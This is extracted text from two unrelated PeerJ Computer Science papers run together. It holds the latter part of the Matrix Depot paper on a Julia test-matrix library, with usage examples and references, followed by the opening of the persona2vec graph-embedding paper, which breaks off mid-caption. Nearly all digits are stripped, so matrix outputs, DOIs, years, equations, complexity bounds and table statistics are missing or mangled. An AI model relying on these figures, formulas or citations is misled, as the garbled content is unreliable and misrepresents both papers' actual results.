this case the output has type regprob, which is defined as immutable regprob{t} a::abstractmatrix{t} # matrix of interest b::abstractvector{t} # right-hand side x::abstractvector{t} # the solution to ax = b end if r is a generated test problem, then r.a, r.b, and r.x are the matrix a and vectors x and b respectively. if the solution is not provided by the problem, the output is stored as type regprobnosolution, which is defined as immutable regprobnosolution{t} a::abstractmatrix{t} # matrix of interest b::abstractvector{t} # right-hand side end for example, the test problem wing can be generated as follows. > matrixdepot("wing") a problem with a discontinuous solution ======================================= input options: * [type,] dim, t , t , [matrixonly]: the dimension of matrix is dim. t and t are two real scalars such that < t < t < . if matrixonly = false, the matrix a and vectors b and x in the linear system ax = b will be generated(matrixonly = true by default). * [type,] n, [matrixonly]: t = / and t = / . groups: ["regprob"] zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. references: g. m. wing, a primer on integral equations of the first kind, society for industrial and applied mathematics, , p. . > a = matrixdepot("wing", ) x array{float , }: . . . . . . . . . . . . . . . . > r = matrixdepot("wing", , false) test problems for regularization methods a: x array{float , }: . . . . . . . . . . . . . . . . b: -element array{float , }: . . . . x: -element array{float , }: . . . . > r.x -element array{float , }: . . . . matrix data from external sources matrix depot provides access to matrices from matrix market (boisvert et al., ) and the university of florida sparse matrix collection (davis & hu, ), both of which contain many matrices taken from applications. in particular, these sources contain many large, sparse matrices. matrix market and the university of florida sparse matrix collection both categorize matrices by application domain and the problem source and both provide matrices in matrix market format (boisvert, pozo & remington, ). these similarities allow us to design a generic interface for both collections. the symbol :get (or :g) is used for downloading matrices from both collections and the symbol :read (or :r) is used for reading in matrices already downloaded. downloaded matrix data is stored on disk in the matrix market format and when read into julia is stored in the type sparsematrixcsc. zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. matrixdepot.update()downloads the matrix name data files from the two web servers. > matrixdepot.update() \% total \% received \% xferd average speed time time time current dload upload total spent left speed k k --:--:-- : : --:--:-- k \% total \% received \% xferd average speed time time time current dload upload total spent left speed --:--:-- : : --:--:-- the university of florida sparse matrix collection is divided into matrix groups and the group of a matrix forms part of the full name of the matrix (davis & hu, ). for example, the full name of the matrix _bus in the harwell-boeing collection is hb/ _bus. > matrixdepot("hb/ _bus", :get) \% total \% received \% xferd average speed time time time current dload upload total spent left speed : : : : --:--:-- > matrixdepot("hb/ _bus", :read) x symmetric{float ,sparsematrixcsc{float ,int }}: . . . ... . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . ... . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . ... ... . . . . . . . . . . ... . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ... . . . . . . . . . . . . . . . . . . matrices from the university of florida sparse matrix collection are stored in matrixdepot/data/uf and they are stored by group (to avoid duplicate names), i.e., one directory per group. similarly, matrices from matrix market are stored in matrixdepot/data/mm. both directories are untracked by git. many matrices in the university of florida sparse matrix collection contain problem-specific metadata, all of which is downloaded. the metadata is accessed by setting the keyword argument meta to true. then instead of returning the matrix, matrix depot will return the metadata (including the matrix) as a dictionary. for example, the imdb movie database zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. pajek/imdb has metadata related to actors and movies. the following command stores all the metadata of pajek/imdb in a variable r, where r["imdb"] is the matrix. > r = matrixdepot("pajek/imdb", :r, meta = true) dict{abstractstring,any} with entries: "imdb_colname" => "’la tata’ castro, maria tereza\n’la veneno’... "imdb_moviebacon" => x array{float , } "imdb_code" => "drama\nshort\ndocumentary\ncomedy\nwestern\nfamily... "imdb_kevinbacon" => x array{float , } "imdb_actorbacon" => x array{float , } "imdb_category" => x array{float , } "imdb" => x sparse matrix with float entries "imdb_year" => x array{float , } we can download a whole group of matrices from the university of florida sparse matrix collection using the command matrixdepot("group name/*", :get). the next example downloads all matrices in the gset group of matrices from random graphs (contributed by y. ye) then displays all the matrices in matrix depot, including the newly downloaded matrices. > matrixdepot("gset/*", :get) downloading all matrices in group gset... \% total \% received \% xferd average speed time time time current dload upload total spent left speed --:--:-- --:--:-- --:--:-- download:/home/weijian/.julia/v . /matrixdepot/src/../data/uf/gset/g .tar.gz g /g .mtx \% total \% received \% xferd average speed time time time current dload upload total spent left speed --:--:-- --:--:-- --:--:-- download:/home/weijian/.julia/v . /matrixdepot/src/../data/uf/gset/g .tar.gz g /g .mtx \% total \% received \% xferd average speed time time time current dload upload total spent left speed --:--:-- --:--:-- --:--:-- download:/home/weijian/.julia/v . /matrixdepot/src/../data/uf/gset/g .tar.gz g /g .mtx \% total \% received \% xferd average speed time time time current dload upload total spent left speed --:--:-- --:--:-- --:--:-- ... > matrixdepot() matrices: ) baart ) binomial ) blur ) cauchy ) chebspec ) chow ) circul ) clement ) companion ) deriv ) dingdong ) fiedler ) forsythe ) foxgood ) frank ) golub ) gravity ) grcar ) hadamard ) hankel ) heat ) hilb ) invhilb ) invol ) kahan ) kms ) lehmer ) lotkin ) magic ) minij ) moler ) neumann ) oscillate ) parallax ) parter ) pascal zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ) pei ) phillips ) poisson ) prolate ) randcorr ) rando ) randsvd ) rohess ) rosser ) sampling ) shaw ) spikes ) toeplitz ) tridiag ) triw ) ursell ) vand ) wathen ) wilkinson ) wing ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g ) gset/g groups: all data eigen ill-cond inverse pos-def random regprob sparse symmetric the full name of a matrix in matrix market comprises three parts: the collection name, the set name, and the matrix name. for example, the full name of the matrix bcsstk in the set bcsstruc from the harwell-boeing collection is harwell-boeing/bcsstruc /bcsstk . note that both set name and matrix name are in lower case. > matrixdepot("harwell-boeing/bcsstruc /bcsstk ", :get) \% total \% received \% xferd average speed time time time current dload upload total spent left speed k k : : : : --:--:-- download:/home/weijian/.julia/v . /matrixdepot/data/mm/harwell-boeing/bcsstruc /bcsstk .mtx.gz > matrixdepot("harwell-boeing/bcsstruc /bcsstk ", :read) x symmetric{float ,sparsematrixcsc{float ,int }}: . e . - . e ... . . . . . . . - . e . . e . . - . . . e . . - . e . - . e . . - . e . . ... . . - . . . . . . . . . . . . - . e . . . . . e . . ... ... . . . . . . . . . e - . e . . . - . e - . zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . ... . e - . e . . . . . . . . . e . . . . - . . e . . . . e . e . . . ... . e . e we recommend downloading matrices from the university of florida sparse matrix collection when there is a choice, because almost every matrix from matrix market is included in it. concluding remarks matrix depot follows in the footsteps of earlier collections of matrices. its novelty is threefold. first, it is extensible by the user, and so can be adapted to the user’s needs. in doing so it facilitates experimentation, and in particular makes it easier to do reproducible research. second, it combines several existing test matrix collections, namely higham’s test matrix toolbox, hansen’s regularization problems, and the university of florida sparse matrix collection, in order to provide both parametrized test matrices and real-life sparse matrix data in a single framework. third, it fully exploits the julia language. it uses multiple dispatch to help provide a simple interface and, in particular, to allow matrices to be generated in any of the numeric data types supported by the language. matrix depot therefore anticipates the development of intrinsic support in julia for computations with bigfloat and other data types. matrix depot has been in development since . it is an open source project (https://github.com/weijianzhang/matrixdepot.jl) hosted on github and is available under the mit license. a first release was announced in december . matrix depot v . . is the latest official release and consists of around , lines of source code, with test coverage of . % according to codecov (https://codecov.io/). from github traffic analytics, we learn that matrix depot has – unique downloads (unique cloners) every month. matrix depot also benefits the development of other julia packages. lightgraphs (https://github.com/juliagraphs/lightgraphs.jl), an optimized graph package for julia, for example, has embedded matrix depot as its database. we built matrix depot to facilitate the development and testing of matrix (and other) algorithms in julia. and we will continue to develop matrix depot by introducing new test matrices and integrating other test collections. acknowledgements the authors are grateful to jiahao chen (mit), stefan güttel (the university of manchester), and tim davis (texas a & m university) for suggestions, and to per christian hansen for allowing us to incorporate problems from regularization tools. zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/weijianzhang/matrixdepot.jl https://codecov.io/ https://github.com/juliagraphs/lightgraphs.jl http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the work of higham was supported by european research council advanced grant matfun ( ) and engineering and physical sciences research council grant ep/i x/ . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: european research council advanced grant matfun: . engineering and physical sciences research council grant: ep/i x/ . competing interests nicholas j. higham is an academic edtor for peerj computer science. author contributions • weijian zhang conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • nicholas j. higham conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: matrix depot: https://github.com/weijianzhang/matrixdepot.jl. references bai z, day d, demmel j, dongarra j. . a test matrix collection for non-hermitian eigenvalue problems (release . ). technical report cs- - , department of computer science. knoxville: university of tennessee, knoxville. lapack working note , pp. . betcke t, higham nj, mehrmann v, schröder c, tisseur f. . nlevp: a collection of nonlinear eigenvalue problems. acm transactions on mathematical software ( ): : – : . bezanson j, edelman a, karpinski s, shah vb. . julia: a fresh approach to numeri- cal computing. arxiv preprint. arxiv: . . bezanson j, karpinski s, shah vb, edelman a. . julia: a fast dynamic language for technical computing. arxiv preprint. arxiv: . . boisvert rf, pozo r, remington k, barrett rf, dongarra jj. . matrix market: a web resource for test matrix collections. in: boisvert rf, ed. quality of numerical software: assessment and enhancement. london: chapman and hall, – . zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/weijianzhang/matrixdepot.jl http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. boisvert rf, pozo r, remington ka. . the matrix market exchange formats: initial design. technical report nistir . gaithersburg: national institute of standards and technology, pp. . clement pa. . a class of triple-diagonal matrices for test purposes. siam review ( ): – doi . / . davis ta, hu y. . the university of florida sparse matrix collection. acm transactions on mathematical software ( ): : – : . available at http://www.cise. ufl.edu/research/sparse/matrices. donoho dl, stodden v. . reproducible research in the mathematical sciences. in: higham nj, dennis mr, glendinning p, martin pa, santosa f, tanner j, eds. the princeton companion to applied mathematics. princeton: princeton university press, – . duff is, grimes rg, lewis jg. . sparse matrix test problems. acm transactions on mathematical software ( ): – doi . / . . fousse l, hanrot g, lefèvre v, pélissier p, zimmermann p. . mpfr: a multiple- precision binary floating-point library with correct rounding. acm transactions on mathematical software ( ): : – : . gear cw. . a simple set of test matrices for eigenvalue programs. math. comp. ( ): – doi . /s - - - - . gregory rt, karney dl. . a collection of matrices for testing computational al- gorithms. new york: wiley. reprinted with corrections by robert e. krieger, huntington, new york, . hansen pc. . regularization tools: a matlab package for analysis and solution of discrete ill-posed problems. numerical algorithms ( ): – doi . /bf . hansen pc. . rank-deficient and discrete ill-posed problems: numerical aspects of linear inversion. philadelphia: society for industrial and applied mathematics, xvi+ pp. hansen pc. . regularization tools version . for matlab . . numer. algorithms ( ): – doi . /s - - - . hansen pc. . regularization tools. a matlab package for analysis and solution of discrete ill-posed problems. version . for matlab . . report, information and mathematics modelling. technical university of denmark, dk- lyngby, denmark. hansen pc. . discrete inverse problems: insight and algorithms. philadelphia: society for industrial and applied mathematics, xii+ pp. higham nj. . algorithm : a collection of test matrices in matlab. acm transactions on mathematical software ( ): – doi . / . . higham nj. . the test matrix toolbox for matlab (version . ). numerical analysis report no. , manchester centre for computational mathematics. manchester, england. higham nj. . accuracy and stability of numerical algorithms. second edition. philadelphia: society for industrial and applied mathematics, xxx+ pp. zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://www.cise.ufl.edu/research/sparse/matrices http://www.cise.ufl.edu/research/sparse/matrices http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - - http://dx.doi.org/ . /bf http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. marques oa, vömel c, demmel jw, parlett bn. . algorithm : a testing infras- tructure for symmetric tridiagonal eigensolvers. acm transactions on mathematical software ( ): : – : . pei ml. . a test matrix for inversion procedures. communications of the acm ( ): doi . / . . taylor a, higham dj. . contest: a controllable test matrix toolbox for matlab. acm transactions on mathematical software ( ): : – : . zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. persona vec: a flexible multi-role representations learning framework for graphs persona vec: a flexible multi-role representations learning framework for graphs jisung yoon , , kai-cheng yang , woo-sung jung , , and yong-yeol ahn , , department of industrial and management engineering, pohang university of science and technology, pohang, republic of korea center for complex networks and systems research, luddy school of informatics, computing, and engineering, indiana university, bloomington, in, usa department of physics, pohang university of science and technology, pohang, republic of korea asia pacific center for theoretical physics, pohang, republic of korea connection science, massachusetts institute of technology, cambridge, ma, usa network science institute, indiana university, bloomington, in, usa abstract graph embedding techniques, which learn low-dimensional representations of a graph, are achieving state-of-the-art performance in many graph mining tasks. most existing embedding algorithms assign a single vector to each node, implicitly assuming that a single representation is enough to capture all characteristics of the node. however, across many domains, it is common to observe pervasively overlapping community structure, where most nodes belong to multiple communities, playing different roles depending on the contexts. here, we propose persona vec, a graph embedding framework that efficiently learns multiple representations of nodes based on their structural contexts. using link prediction- based evaluation, we show that our framework is significantly faster than the existing state-of-the-art model while achieving better performance. subjects artificial intelligence, data science, network science and online social networks, social computing keywords graph embedding, overlapping community, social context, social network analysis, link prediction introduction graph embedding maps the nodes in a graph to continuous and dense vectors that capture relations among the nodes (perozzi, al-rfou & skiena, ; grover & leskovec, ; tang et al., ). resulting node representations allow direct applications of algebraic operations and common algorithms, facilitating graph mining tasks such as node classification (sen et al., ; perozzi, al-rfou & skiena, ), community detection (fortunato, ; yang et al., ), link prediction (grover & leskovec, ), visualization (tang et al., ), and computer vision (xie et al., ). most methods map each node to a single vector, implicitly assuming that a single representation is sufficient to capture the full characteristics of a node. however, nodes often play multiple roles. for instance, people have multiple roles, or “personas”, across contexts (e.g., professor, employee, and so on) (ahn, bagrow & how to cite this article yoon j, yang k-c, jung w-s, ahn y-y. . persona vec: a flexible multi-role representations learning framework for graphs. peerj comput. sci. :e doi . /peerj-cs. submitted december accepted february published march corresponding author yong-yeol ahn, yyahn@iu.edu academic editor yilun shang additional information and declarations can be found on page doi . /peerj-cs. copyright yoon et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:yyahn@�iu.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ lehmann, ; coscia et al., ; leskovec et al., ; leskovec, lang & mahoney, ). similarly, proteins and other biological elements play multiple functionalities (palla et al., ; gavin et al., ; ahn, bagrow & lehmann, ). another example is the polysemy of words when their relations are modeled with graphs; many words possess multiple meanings differentiated by the contexts (chen, liu & sun, ; li & jurafsky, ; iacobacci, pilehvar & navigli, ). explicit modeling of such multiplicity and overlapping clusters has been fruitful not only for community detection (rosvall et al., ; coscia et al., ; epasto, lattanzi & paes leme, ), but also for improving the quality of embedding (li & jurafsky, ; epasto & perozzi, ; liu et al., ). yet, with the scarcity of embedding methods embracing this idea, the full potential of this approach has not been properly explored. in this paper, we propose persona vec, a scalable framework that builds on the idea of ego-splitting (epasto, lattanzi & paes leme, ), the process of identifying local structural contexts of a node via performing local community detection on the node’s ego-network. for each detected local community (role), we transform each node into multiple personas if there are multiple local communities to which the node belongs. after the split, the original node is replaced by the new persona nodes that inherit the connection from each local community, producing a new persona graph. instead of separating a node’s persona nodes from each other completely (epasto & perozzi, ), we add directed, weighted edges between personas to capture their origin. in doing so, we allow the direct application of the existing graph embedding methods. in addition, we take an approach of considering persona-based learning as fine-tuning of the base graph embedding, achieving both efficiency and balance between information from the original graph and the persona graph. compared with the previous approach (epasto & perozzi, ), our framework is conceptually simpler to understand and practically easier to implement. furthermore, it achieves better performance in the link prediction tasks while being much faster. we also would like to clarify that the primary purpose of persona splitting is not about obtaining multiple representations, each of which may be suited for a specific task; it is about teasing out multiple contexts that a single node may possess. in other words, even with a single task, we argue that learning multiple representations for some nodes is highly beneficial. in sum, we would like to highlight that our approach ( ) drastically lowers the barrier for combining existing algorithms with persona splitting, ( ) significantly improves the efficiency of the ego-splitting approach, while ( ) consistently excelling the previous state-of-the-art model in the link prediction task. our implementation of persona vec is publicly available at https://github.com/jisungyoon/persona vec. related work in addition to graph embedding, our work is closely related to the research of identifying overlapping communities in graphs. various non-embedding methods such as link clustering (ahn, bagrow & lehmann, ; evans & lambiotte, ), clique percolation (palla et al., ), and mixed membership stochastic blockmodel (airoldi et al., ) have been proposed. another thread of works focuses on using local graph structure to yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/jisungyoon/persona vec http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ extract community information (coscia et al., ; epasto et al., ; epasto, lattanzi & paes leme, ). specifically, epasto, lattanzi & paes leme ( ) introduce the persona graph method for detecting overlapping communities in graphs, leveraging ego-network partition. the combination of ego-network analysis and graph embedding methods is still rare. an example is splitter (epasto & perozzi, ), which we use as the baseline in this paper. instead of constraining the relations between personas with a regularization term, we propose a simpler and more efficient way of adding persona edges to the graph. our work is also related to the word disambiguation problem in a word embedding. recently, word embedding techniques (mikolov et al., a, b; pennington, socher & manning, ) have been extensively applied to various nlp tasks as the vectorized word representations can effectively capture syntactic and semantic information. although some words have multiple senses depending on the context, the original word embedding methods only assign one vector to each word. li & jurafsky ( ) shows that embedding that is aware of multiple word senses and provides a vector for each specific sense does improve the performance for some nlp tasks. for this issue, some utilize the local context information and clustering for identifying word sense (reisinger & mooney, ; wu & giles, ; neelakantan et al., ), some resort to external lexical database for disambiguation (rothe & schütze, ; iacobacci, pilehvar & navigli, ; camacho-collados, pilehvar & navigli, ; chen, liu & sun, ; jauhar, dyer & hovy, ; pelevina et al., ), while some combine topic modeling methods with embedding (liu, qiu & huang, ; liu et al., ; cheng et al., ; zhang & zhong, ). we adopt the idea of assigning multiple vectors to each node in the graph to represent different roles as well as exploiting local graph structure for the purpose. proposed method: persona vec persona vec creates a persona graph, where some nodes are split into multiple personas. we then apply a graph embedding algorithm to the persona graph to learn the embeddings of the personas (see fig. ). let us explain the method formally. let g = (v, e) be a graph with a set of nodes v and a set of edges e. |v| and |e| denote the number of nodes and edges respectively. let f : v ! rd be the embedding function that maps a node v to a d-dimensional vector space (d � |v|). refined ego-splitting we adopt and refine the ego-splitting method (epasto, lattanzi & paes leme, ; epasto & perozzi, ). for each node in the original graph, we first extract its ego-graph, remove the ego, and identify the local clusters. every cluster in the ego-graph leads to a new persona node in the persona graph (see figs. a and c). for example, if we consider each connected component as a local community with a connected component algorithm, node c in the original graph belongs to two non-overlapping clusters {a,b} and {d,e,f} in its ego-graph. given these two clusters, in the persona graph, c is split into c and c to represent the two roles in respective clusters. c and c inherit the yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ connections of c from both clusters separately (see fig. c). on the other hand, node a only belongs to one ego cluster {b,c}, so it does not split into multiple personas. any graph clustering algorithm can be employed for splitting a node into personas. the simplest algorithm is considering each connected component in the ego-network (sans the ego) as a cluster. this approach is fast and works well on sparse graphs. however, in dense graphs, ego-networks are more likely to form fewer connected components, thus other algorithms such as the louvain method (blondel et al., ), infomap (rosvall & bergstrom, ), and label propagation (raghavan, albert & kumara, ) would be more appropriate. in previous studies, the personas get disconnected without retaining the information about their origin, creating isolated components in the splitting process (epasto, lattanzi & paes leme, ; epasto & perozzi, ). because of this disconnectedness, common embedding methods could not be directly applied to the splitted graph. a previous study attempted to address this issue by imposing a regularization term in the cost function to penalize separation of persona nodes originating from the same node (epasto & perozzi, ). here, instead of adopting the regularization strategy, we add weighted persona edges between the personas, maintaining the connectedness between them after the splitting (see fig. c). because the persona graph stays connected, classical graph algorithms and graph embedding methods can now be readily applied without any modification. as we will show later, our strategy achieves both better scalability and better performance. in the persona graph, we set the weights of the unweighted original edges as and tune the strength of the connections among personas with λ. persona edges are directed and weighted, with weight λkoi, where k o i is the out-degree of the persona node after splitting (see fig. c). assigning weight proportional to koi helps the random walker exploring both the local neighbors and other parts of the graph connected to the other personas regardless of the out-degree koi. a b c d e f g h (a) original graph a b c c d e f f g h original edge persona edge (c) persona graph a b c c .. h (e) persona embedding d a b c d .. h (b) base graph embedding d graph embedding ego-split initialize (d) graph embedding λ λ λ λ figure illustration of persona vec framework. (a) a graph with an overlapping community structure. (b) graph embedding of the original graph is obtained first to initialize the persona embed- dings. (c) transform the original graph into a persona graph. every edge in the original graph is preserved in the persona graph, while new directed persona edges with weight λki o are added between the persona nodes. (d) graph embedding is applied to the persona graph. (e) the final persona embedding where each persona node has its own vector representation. full-size doi: . /peerj-cs. /fig- yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ imagine node u, which is split into np personas. consider one of the personas i with out- degree koi and persona edges with weight wi. then the probability pi that an unbiased random walker at i visits neighbors connected with the original edges at the next step is koi koi þnpwi : ( ) if we set constant weight wi = λ, then pi ¼ koi koi þnp� ¼ þnp koi � ; ( ) which depends on koi. a random-walker would not explore its local neighborhood if np � koi, while the opposite happens when np � koi. instead, assigning the weight proportional to koi, namely wi = λk o i, removes such bias because pi ¼ koi koi þnp�koi ¼ þnp� ; ( ) which is independent of koi. our experiments also show that using the out-degree yields better performance than assigning the identical weight to each persona edge. our algorithm for refined ego-splitting is described in algorithm . note that it can be generalized to the directed graphs. persona graph embedding as explained above, any graph embedding algorithm that recognizes edge direction and weight can be readily applied to the persona graph. although we use node vec as the embedding method here, other embedding methods can also be employed. we initialize the persona vectors with the vectors from the original graph before ego-splitting (see fig. b) to leverage the information from the original graph structure. persona nodes that belong to the same node in the original graph are thus initialized with the same vector. we then execute the embedding algorithm for a small number of epochs to fine-tune the embedding vectors with the information from the persona graph (see fig. ). experiments show that usually only one epoch of training is enough. we find that training the embedding on the persona graphs from scratch fails to yield comparable results. instead, initializing the embedding with the original graphs, i.e., our present method, consistently improves the performance, suggesting that mixing the structural information from both the original graph and the persona graph is crucial. our full algorithm is described in algorithm . complexity space complexity the persona graph is usually larger than the original graph, but not too large. node u with degree ku may be split into at most ku personas. in the worst case, the number of nodes in the persona graph can reach o(|e|). but, in practice, only a subset of nodes split into yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ personas, and the number of personas rarely reaches the upper bound. if we look at the persona edges, for a node u with degree ku, at most oðk uÞ new persona edges may be added. thus, the whole persona graph has at most oðjvj�k maxÞ or o(|v| ) (∵ kmax ≤ |v|) extra persona edges. if graph’s degree distribution follows a power-law distribution p(k) ∼ k−γ, then kmax ∼ |v| /γ− . hence, it could be o(|v|γ+ /γ− ) and it is between o(|v| ) and o(|v| ) (∼ ≤ γ ≤ in general). however, real graph tends to be sparse and ki � |v|. if we further assume ki < ffiffiffiffiffiffi jej p holds for every node, then pjvj n¼ k n � pjvj n¼ kn ffiffiffiffiffiffi jej p ¼ jej ffiffiffiffiffiffi jej p . under this assumption, the upper bound becomes o(|e| / ). similarly, with the scale-free condition, the upper bound could be o(|e||v| /γ− ), which is between o(|e||v| / ) and o(|e||v|). again, in practice, the number of persona edges is much smaller than this upper bound. to illustrate, we list the number of nodes and persona edges in the persona graph for the graphs we use in this paper in table . all considered, the extra nodes and edges do not bring too much space complexity burden in practice. time complexity assessing the time complexity requires consideration of the two steps: ego-splitting and embedding. the ego-splitting algorithm has complexity of oðjej = þ ffiffiffiffiffiffi jej p tðjejÞÞ in the worst case, where |e| is the number of edges in the original graph and t(|e|) is the algorithm refined ego-splitting for generating the persona graph. case of the undirected graph. input: original graph g(v, e); weight parameter λ; non-overlapping local clustering algorithm c output: persona graph gp(vp, ep); node to personas mapping v p; persona to local cluster mapping p c : function refegosplit(g(v, e), λ, c) : for each vo ∈ v do : pvo cðvoÞ ⊳ find local clusters of vo : for each p ∈ pvo do : create vp, and add to gp, v p(vo) ⊳ create persona nodes for local clusters : p c(vp) ) p : for each edge (vi, vj) in e do : w ) weight of edge : for each persona node vp in v p(vi) do : for each persona node v′p in v p(vi) do : if vi ∈ p c(v′p) and vj ∈ p c(vp) then : add original edges (vp, v′p, w), (v′p, vp, w) to ep : ko ) out-degree sequence after adding original edges : for each vo ∈ v do : for each pair (vi, vj) in v p(vo) do : add persona edges (vi, vj, ki o × λ), (vj, vi, kj o × λ) to ep : return gp(vp, ep), v p, p c yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ complexity of detecting the ego clusters in the graph with |e| edges (epasto, lattanzi & paes leme, ). the embedding on the persona graph, which dominates the whole embedding procedure, has complexity o(|vp|γ twd( + log(|vp|))) which is time complexity of node vec, where |vp| is the number of nodes, γ is the number of random walkers, d is the embedding dimension, and w is the window size (chen et al., ). algorithm persona vec. our method for generating persona node embeddings. input: g(v,e), original graph d, embedding dimension γb, number of walks per node for base embedding tb, random walk length for base embedding wb, window size for base embedding γp, number of walks per node for persona embedding tp, random walk length for persona embedding wp, window size for persona embedding a, learning rate refegosplit, refined ego-splitting method v p, node to personas mapping embeddingfunc, a graph embedding method e.g. deepwalk, node vec output: �gp , a np × d matrix with d-dimensional vector representations for all np persona nodes : function persona vec(g, d, γb, tb, wb, gp, tp, wp, refegosplit, embeddingfunc, a) : gp, v p ) refegosplit(g) : Φg ) embeddingfunc(g, d, γb, tb, wb, a) : for each vo ∈ v do : for each persona node vp in v p(vo) do : �gp (vp) = Φg(vo) : �gp ) embeddingfunc(gp, γp, tp, wp, a, �gp ) : return �gp table descriptive statistics of the graphs used in the evaluation. we report the number of nodes |v|, number of edges |e|, number of nodes in the persona graph |vp|, the ratio of |vp| over |v|, number of persona edges |ep| added in ego-splitting, and the ratio of |ep| over |e / | which is the upper bound of space complexity. dataset type vj j ej j vp � � � � vp � � � �= vj j ep � � � � ep=e = � � � � ppi undirected , , , . , . ca-hepth undirected , , , . , . ca-astroph undirected , , , . , . wiki-vote directed , , , . , . soc-epinions directed , , , . , , . yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the final complexity is oðjej = þ ffiffiffiffiffiffi jej p tðjejÞÞþoðjvjctwdð þ logðjvjÞÞÞ. removing the constant factors and assuming close-to-linear local community detection algorithm, the whole process has time complexity of o(|e| / ) with space complexity of o(|e| / ) if ki < ffiffiffiffiffiffi jej p holds. complexity can be increased depending on the clustering algorithms on the ego-network. to test the validity of our assumptions, we sample , graphs from a public network repository (rossi & ahmed, ). we apply the refined ego-splitting with connected component algorithms on these samples and report the actual number of persona edges |ep| with respect to the practical upper bound |e| / in fig. , which shows that the actual number of persona edges |ep| rarely exceeds the tighter upper bound that we propose and is usually orders of the magnitude smaller. optimization any kind of graph embedding method can be considered, for simplicity, we choose the classical random-walker based embedding method (e.g., node vec, deepwalk). in the model (perozzi, al-rfou & skiena, ), the probability of a node vi co-occurring with a node vj is estimated by pðvijvjÞ¼ expð� vi � �vjÞ pv k¼ expð� vk ��vjÞ ; ( ) where �vi and �′vi are the ‘input’ and ‘output’ embedding of node i. we use input embedding � which is known to be more useful and more widely used. denominator of eq. ( ) is computationally expensive (yang et al., ; cao, lu & xu, ) and there are figure comparison of the the number of persona edges |ep| to the practical upper bound |e| / . full-size doi: . /peerj-cs. /fig- yoon et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ two common approximations: hierarchical softmax (morin & bengio, ) and negative sampling (mikolov et al., b). we adopt negative sampling not only because it is simpler and popular but also because it shows better performance. case study before diving into systematic evaluations, we provide two illustrative examples: zachary’s karate club network and a word association network. case study: zachary’s karate club network we use zachary’s karate club network (zachary, ), a well-known example for the community detection. nodes represent members of the karate club, and edges represent ties among the members (see fig. a). although it is often considered to have two large disjoint communities, smaller overlapping communities can also be seen, highlighted by nodes such as , , , and . in fig. b, we present the persona graph of the network. persona vec successfully recognizes these bridge nodes and places their personas in reasonable locations. take node for example. it splits into four persona nodes, which then end up in two different communities. the orange and green communities are clearly a b c d figure case study: zachary’s karate club network. (a) the zachary’s karate club network with the force-atlas layout (zachary, ). nodes are colored by communities detected by the louvain mod- ularity method (blondel et al., ). (b) the persona graph. nodes are colored by k-means clusters (macqueen, ) from the embedding vectors. coordinates of the persona nodes come from the -d projection of the embedding with t-sne (maaten & hinton, ). light gray lines represent the persona edges. (c) the network with % of edges ( edges) removed for the link prediction experiment. (d) the network with ten predictions with the highest 